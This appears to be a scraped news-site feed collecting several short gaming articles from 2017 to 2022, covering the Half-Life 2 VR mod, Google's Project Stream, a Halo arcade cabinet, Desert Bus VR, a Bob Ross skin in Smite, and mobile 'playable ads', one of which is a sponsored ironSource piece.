On Friday, a group of fans known as the Source VR Mod Team released Half-Life 2: VR Mod. As long as you own the original, you can download and play the mod free through Steam.

While it’s currently in public beta, the mod allows you to play through Half-Life 2’s single-player story from start to finish. The Source VR Mod Team integrated a handful of features found in Half-Life: Alyx to modernize the experience and make it playable in VR. For instance, you switch between weapons using the same selection grid found in Valve’s 2020 game.

Other VR-minded tweaks include the addition of optional laser sights, over-the-shoulder ammo storage, manual reloading and two-handed weapon handling. There’s even support for room-scale movement. The Source VR Mod Team says the project isn’t finished, but that hasn’t stopped people from enjoying the experience, with the mod currently holding an Overwhelmingly Positive rating on 732 reviews.

Like Black Mesa before it, Half-Life 2: VR Mod has been a long time coming. As Eurogamer notes, the project was first announced in 2017 and went through development hell before remerging in 2021. The fact you can play it today is thanks to a recent influx of new team members who "revitalized" development.

Google’s Project Stream makes ‘Assassin’s Creed’ playable in Chrome https://briefnews.eu/googles-project-stream-makes-assassins-creed-playable-in-chrome/ https://briefnews.eu/googles-project-stream-makes-assassins-creed-playable-in-chrome/#respond Mon, 01 Oct 2018 18:04:12 +0000 http://briefnews.eu/googles-project-stream-makes-assassins-creed-playable-in-chrome/

Project Stream promises to deliver the holy grail to video game fans around the globe — the ability to play the latest AAA games on any laptop or PC via a stable, no-lag streaming service. Google is preparing to publicly test Project Stream with a “limited number of participants” on October 5th, letting them play Assassin’s Creed Odyssey for free in the Chrome browser. That’s the latest game in the Assassin’s Creed series, and it’s a massive open-world adventure packed with 4K-capable graphics.

In a demo video, Google shows Assassin’s Creed Odyssey streaming at 1080p and 60fps.

If all goes to plan, the game should work on any laptop or PC, regardless of how recently you’ve updated the graphics card. However, Google recommends a home internet connection of at least 25 megabits per second. For anyone interested in playing the new Assassin’s Creed on the day it comes out, for free, in the Chrome browser, there’s an application right here.

Google developers said the beta test is meant to push the limits of Project Stream. AAA video games are far more complicated to stream than a movie or TV show, offering dense worlds of animation and input-sensitive information.

“The idea of streaming such graphically-rich content that requires near-instant interaction between the game controller and the graphics on the screen poses a number of challenges,” developers wrote. “When streaming TV or movies, consumers are comfortable with a few seconds of buffering at the start, but streaming high-quality games requires latency measured in milliseconds, with no graphic degradation.”

Rumors have been flying for months about a potential Google-branded streaming service. Initial reports said any such service would link up to Chromecast, allowing users to play AAA games on their TVs without modern consoles. There’s also buzz about Google adding Bluetooth capabilities to the next version of Chromecast, opening up the door to connected gamepads.

Google isn’t alone in the streaming-game space. Sony has PlayStation Now, but it hasn’t exactly solved the lag issue yet, while companies like OnLive have burst onto the scene with big streaming promises only to quietly implode soon after. One of the latest companies to enter the scene is LiquidSky, which has been fairly silent since officially launching in March 2017. Meanwhile, Microsoft is working on a game-streaming service for the next Xbox generation.

The ‘Halo’ arcade game is playable at every Dave & Buster’s https://briefnews.eu/the-halo-arcade-game-is-playable-at-every-dave-busters/ https://briefnews.eu/the-halo-arcade-game-is-playable-at-every-dave-busters/#respond Sat, 11 Aug 2018 12:42:36 +0000 http://briefnews.eu/the-halo-arcade-game-is-playable-at-every-dave-busters/

There’s a new Halo game out this summer and you don’t need an Xbox to play it. Instead, all you have to do is roll up to any Dave & Buster’s and start popping quarters into it. Halo: Fireteam Raven is a four-player co-op on-rails arcade shooter developed by Raw Thrills and Play Mechanix, set during the events of the first (and best) game. Fireteam Raven plays out across a 130-inch wide 4K screen.

If you’re not familiar with Raw Thrills by name, you’ve definitely seen its games at your local movie theater or Dave & Busters prior. Headed by gaming industry legend Eugene Jarvis who worked at Williams on pinball machines before transitioning to Atari and Midway, Jarvis’ company makes high-end arcade cabinets for games based on Batman and Jurassic Park. Before this, he partnered with Housemarque on a Nex Machina cabinet and he revived the Crusin’ series for arcades.

Not in the United States and still want to play? Microsoft promises that the game will roll-out to “at least” 20 different countries over the next two months.

Facebook’s ‘playable ads’ bring game demos to the news feed https://briefnews.eu/facebooks-playable-ads-bring-game-demos-to-the-news-feed/ https://briefnews.eu/facebooks-playable-ads-bring-game-demos-to-the-news-feed/#respond Thu, 02 Aug 2018 08:06:56 +0000 http://briefnews.eu/facebooks-playable-ads-bring-game-demos-to-the-news-feed/

Facebook’s next foray into the gaming space is giving players a chance to try mobile games out before they download them. The social network is calling them “Playable Ads,” which is fairly self-explanatory. There’s a lot of advertising mumbo-jumbo in Facebook’s announcement, but the key takeaway is that you’ll be able to play a brief section of a given mobile title within the News Feed (from the App Store or Google Play, not a Facebook game) without actually downloading it. Google has tested similar with its Instant Apps and plenty of free-to-play titles have playable advertisements stuffed into their experiences.

It’s apparently already been pretty successful, with Angry Birds developer Rovio saying it’d seen a “70 percent lift in day seven return on ad spend,” during early tests. All that to say, people are responding positively to the feature. The functionality is rolling out to all advertisers starting today, so you can expect to see them showing up in your Feed sooner rather than later.

The Night Ripper Is A Playable Take On 80’s Horror Movies https://briefnews.eu/the-night-ripper-is-a-playable-take-on-80s-horror-movies/ https://briefnews.eu/the-night-ripper-is-a-playable-take-on-80s-horror-movies/#respond Tue, 30 Jan 2018 13:36:22 +0000 http://briefnews.eu/the-night-ripper-is-a-playable-take-on-80s-horror-movies/ screenshot6.jpg

The Night Ripper will have players walking the streets alone after work, dealing with the frightening presence of a masked killer who will make for a terrifying journey home.

The Night Ripper follows Rachel, a young woman who is just trying to get home after her shift. The police have cordoned off a part of the street, though, blocking her regular route. This sends her down dark, PS1-style alleys and streets where she’ll meet a few people, find some useful items, and likely stumble across the masked killer everyone is looking for. Should she find this unsettling figure, it will be time to rush through the tight corridors of the claustrophobic, shadowy areas around her, using whatever weapons she can find while (literally) fighting panic.

The Night Ripper, like many of developer Puppet Combo’s other horror outings, creates a powerful discomfort with its visual style, setting the player on edge while taking them into a world of 80’s horror/slasher films. It’s all well worth looking into for fans of the genre, and this one in particular might make your own walks home at night seem just a little bit more unsettling.

The Night Ripper is available for free for Puppet Combo’s $ 5+ Patreon donators. For more information on the game and developer Puppet Combo, you can head to the developer’s Patreon page or follow them on Facebook, YouTube, and Twitter.

Legendarily boring ‘Desert Bus’ is playable in VR https://briefnews.eu/legendarily-boring-desert-bus-is-playable-in-vr/ https://briefnews.eu/legendarily-boring-desert-bus-is-playable-in-vr/#respond Wed, 29 Nov 2017 06:13:04 +0000 http://briefnews.eu/legendarily-boring-desert-bus-is-playable-in-vr/

Back in the late 90s, comedic magicians Penn Jillette and Teller made a mini-game collection for Sega CD that was never released and quietly forgotten. Unfortunately for anyone with taste, one of those was the intentionally awful Desert Bus, which Internet sketch group LoadingReadyRun unearthed during a charity stream in 2007. They turned it into their annual program Desert Bus For Hope, which has raised $ 4 million in the last decade while they’ve subjected themselves to one of the most boring games ever made — and now they can do it immersively with Desert Bus VR.

The old 16-bit version belted players into the driver’s seat for an eight-hour real-time trip simulating the route from Tucson, Arizona to Las Vegas. To keep things interesting, the titular bus veers to the right ever so slightly, requiring constant attention. Desert Bus VR refreshes the concept for virtual reality — now you can explore a completely mundane station and bus interior as you roll along your mind-numbing eight-hour journey.

Studio Dinosaur Games added a few other features, including several radio stations, one of which has Jillette himself chattering away. You can honk the horn, open the door and flick the air freshener. Immersion! And if you veer far enough off the road, a tow truck will take you back to the start. Realism! If you want to take the longest virtual ride of your life, Desert Bus VR is available for free on Steam.

The what, how, and why of playable ads https://briefnews.eu/the-what-how-and-why-of-playable-ads/ https://briefnews.eu/the-what-how-and-why-of-playable-ads/#respond Tue, 13 Jun 2017 11:56:35 +0000 http://briefnews.eu/the-what-how-and-why-of-playable-ads/

Presented by IronSource

In 2013, the global ad blocking craze pushed the ad industry to rethink its strategies — users were fed up with intrusive, irrelevant, and boring ads. In response, we slowly saw mobile ads shift towards ad formats and creatives that both took advantage of the mobile medium, and also created a value exchange between users and advertisers.

In 2014, rewarded video ads (or RV), which give users in-app currency in exchange for watching a video advertisement, rose in popularity — finally, an ad format that engaged users and improved the user experience. But now, nearly three years later, advertisers are experimenting with a new ad format that’s pushing the boundaries of interactivity even further: playable ads.

What are playable ads?

Exactly what they sound like — ads that you can play. They’re one of several app advertising units available to mobile advertisers today.

Simply put, playable ads are ads that offer users interactive snippets of gameplay, otherwise known as “micro-games.” There is a call to action at the end (e.g., install the app), they are completely opt-in, and are typically under one minute in length — meaning “time to magic,” as we call it at ironSource, can be as short as 15 seconds.

But most importantly, users love them. They do a great job of providing an enjoyable ad experience that not only shows the user what the advertised app is really like, but also pulls them in for more and gets them fully engaged.

How do playable ads work?

In addition to being true to the spirit of the app, playable ads also offer users multiple opportunities and touch points for engagement — unlike any other kind of app ad unit. They’re made up of three components: tutorial, gameplay, and end card.

The tutorial
The tutorial introduces the player to the mini-game and is short and to the point. In 3 seconds, the tutorial effectively immerses the user in the game and explains how to play. It should be clearly interactive with an intuitive design that doesn’t require too many taps. Above all, the user needs to know from the get-go that this is an ad they can interact with.

Gameplay
Next is the actual gameplay. Despite being a quick and simplified version of the game, this section still gives users a proper glimpse into what playing the game would be like. In 10 to 20 seconds, users should be able to know whether or not they want to install the app and keep playing. In a game, users could play an exciting beginning level. In a camera app, users could snap a picture and overlay it with a funky filter.

The end card
Last is the end card. Here, the playable ad displays a clear call to action (CTA), asking the user to install the app, or giving them some other steps to perform. If it’s an app-install ad and they choose to install, users are redirected to the app store for download.

Throughout the entire playable ad, there should always be an option to x-out, making sure users feel in control and the experience remains positive.

Why playable ads?

Lately, at ironSource we’ve noticed advertisers in markets across the world focus their KPIs on acquiring high-quality users, as opposed to prioritizing scale.

This shift couldn’t come at a better time. Now, with interactive ad units like playable ads available, advertisers are better equipped to acquire high LTV users today than ever before.

Try before you buy
Playable ads work as a “try before you buy” type ad unit, letting users interact with an app’s main features before installing it. The users who end up installing the app after a few seconds of fun gameplay become more likely to open the app later and continue engaging with it over time, creating more high lifetime value (LTV) players.

It’s also because the ads are inherently enjoyable, and actually fun to play with. Like the Super Bowl ads viewers look forward to watching, playable ads are an ad format users actually want to encounter.

Reduce uninstall rates, improve retention rates
App uninstall rates in the first hour can be as high as 25 percent. The figure rises to 64 percent in the first month. But by guaranteeing high LTV early in the user lifecycle, playable ads effectively reduce app uninstall rates and improve retention rates down the line — since users who install via playable ads know what to expect from the app. In fact, we’ve seen retention rates jump to 30-40 percent with playable ads.

Eventually, this process helps advertisers save money, since it weeds out users who wouldn’t enjoy the app — minimizing money potentially wasted on acquiring irrelevant, low LTV users. Thus, even if the cost per install for playable ads is more expensive than a typical video or banner ad, the ROI ends up being higher.

Access to in-ad data
Lastly, sophisticated playable ad creators can provide advertisers with an large amount of in-ad data, giving them real-time insight into the type of users who engage with their ads. In contrast to other ad formats, which are like black boxes that don’t tell us why a user likes the ad or why the user installed the app, playable ads give developers more transparency. Why? Because there are more moving parts in a playable ad — meaning there are more variables to manipulate and optimize for.

For example, in one of our playable campaigns at ironSource, we saw that too many users were losing the mini-game and therefore not installing the app. So we tweaked the difficulty level and found that while there is a very fine line between ‘medium’ and ‘hard,’ users responded better to ‘medium’ because it combines the positive experience of winning along with the challenge and intrigue of the game. Suddenly, engagement and install rates soared. Only an interactive ad could provide enough data to understand exactly what was wrong with the initial ad, and how to better optimize it for performance.

Beyond gaming

For now, playable ads have been mostly confined to the gaming world. But given how enticing and interactive they are, we can expect to see them spill over into more non-gaming app categories.

It’s often the case that gaming advertisers and publishers are the first to utilize the latest innovative mobile ad formats. It was true for offerwall, interstitial, and rewarded video, after all. Like the others, once playable ads have proven their success on gaming apps, non-gaming apps will be the next to hop on the bandwagon and repurpose the format to benefit their unique needs.

‘Smite’ adds Bob Ross as a paint-throwing playable character https://briefnews.eu/smite-adds-bob-ross-as-a-paint-throwing-playable-character/ https://briefnews.eu/smite-adds-bob-ross-as-a-paint-throwing-playable-character/#respond Sun, 07 May 2017 07:26:37 +0000 http://briefnews.eu/smite-adds-bob-ross-as-a-paint-throwing-playable-character/

Bob Ross is about to do battle with the gods. The Joy of Painting host, known for his soft voice, permed afro and “happy little trees,” is coming to Hi-Rez Studios’ mythology-themed MOBA Smite later this month as a character skin for Sylvanus.

Although The Joy of Painting aired in the ’80s and early ’90s, and Ross himself died of lymphoma in 1995, the laid-back artist is enjoying a second round of fame in the gaming community thanks to Twitch. The livestreaming service hosted a marathon of his show two years ago during the launch of Twitch Creative. It was so successful Twitch launched Bob Ross Mondays a month later.

Hi-Rez showed off the new Bob Ross Sylvanus skin during a patch preview earlier this week (it’s around the 45:00 mark if you want to check it out). Ross, in all his afroed and flip-flopped glory, rides atop Sylvanus’ treant, Grover, and paints a landscape during the match. While in combat, he lobs the paint at his enemies and summons happy little trees and clouds. The skin also includes voice overs with some of Ross’ signature mellow catchphrases like, “Gotta give him a friend. Everyone needs a friend.”

Other Bob Ross cosmetic items, like a loading frame and a paint splatter jump stamp, will also be available as part of a bundle. Each one was created in a close partnership with Twitch and the Bob Ross Estate. The bundle will be available on May 9th on PC/Mac and on May 16th on console. It will cost 700 in-game gems or $ 9.99 on Twitch Commerce.

JustAd launches Game Zone playable ad platform https://briefnews.eu/justad-launches-game-zone-playable-ad-platform/ https://briefnews.eu/justad-launches-game-zone-playable-ad-platform/#respond Tue, 14 Mar 2017 12:31:50 +0000 http://briefnews.eu/justad-launches-game-zone-playable-ad-platform/ JustAd makes it easy to create playable ads.

JustAd is launching its fully customizable “playable ad” Game Zone platform for mobile game developers and publishers.

With such ads, players can tap on a mobile ad, and it will take the player directly into playing a version of the game. While others have launched other playable ad platforms, Tel Aviv, Israel-based JustAd contends that its solution enables easy self-service.

Game Zone allows for the individualization of module-based gaming ads. But the person creating the ad doesn’t need to know any coding, according to JustAd. Game Zone is targeted at game developers, ad agencies, demand-side platforms, and ad networks. It lets them personalize module-based gaming ads without writing a single line of code.

“Deeply customized gaming ads have always required an immense amount of time and resources to create, but they are in high demand because they are effective for marketers and fun for users,” said Yariv Erel, cofounder and CEO at JustAd, in a statement. “Game Zone represents a first in our industry — a free, scalable opportunity to create real games, with logic and stages, that can be played within any ad opportunity.”

Playable ads, or ads displaying a mini game, have been shown to drive far higher levels of engagement and better ad recall among mobile users. Over more than 100 playable ad campaigns, JustAd has observed playable ads driving engagement rates averaging 50 clicks per ad, versus standard rich media ads that average approximately 3.5 clicks per ad.

Playable ads also delivered better lifetime value (LTV) and nearly double average revenue per install (ARPI).

Game Zone is launching with 15 game modules (including Match-3, pool, slots, memory, maze, brick breaker, racing and more). Game Zone allows deep customization of branded games, including unique call to action features and a customized game engine to fit both user acquisition and branding purposes. The platform is housed within justAd’s larger drag-and-drop mobile ad studio, Creative Factory. Ultimately, JustAd plans to offer up to 100 types of customizable games for users to develop.

“A customizable playable ad platform has heretofore not existed because it is extremely challenging to create,” added Erel. “Our team spent months developing Game Zone because it delivers much better results, people simply love it and it’s a very tough tech challenge. We think it will change the mobile advertising landscape for the better.”

Game Zone’s technology is based on HTML5. Playable ads created in Game Zone are available in both ZIP file and standard HTML/IAB/MRAID tag. Event-based reporting and heat map reporting are available by default for any ad.

Among the rivals are  1app.com, mNectar, and Chartboost. In an email, Erel said, “We think that playable ads is just starting to get notice like the Google announcement at the Game Developers Conference. We see massive demand for it from all parties.”

He also said, “Our full digital ad platform (Creative Factory) has been trusted to create digital ads for brands like Nike, Hasbro, Pixar, Microsoft, Ford, and countless others, worldwide via their media agencies and ad networks since 2014.”
